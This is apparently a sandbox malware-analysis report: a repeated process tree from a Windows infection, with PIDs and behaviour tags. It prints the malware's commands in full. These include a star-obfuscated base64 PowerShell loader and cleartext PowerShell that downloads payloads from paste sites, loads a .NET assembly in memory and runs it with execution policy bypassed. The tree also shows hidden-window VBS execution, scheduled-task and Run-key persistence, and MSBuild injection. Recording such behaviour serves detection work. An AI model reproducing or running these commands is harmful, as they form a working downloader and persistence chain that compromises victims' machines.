N★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:4572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:4976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5828
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:672
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:5932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:5808
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:1600
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:880
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        
        PID:3380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:4908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:1960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5236
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:1548
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:2488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:4268
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:4680
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2420
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
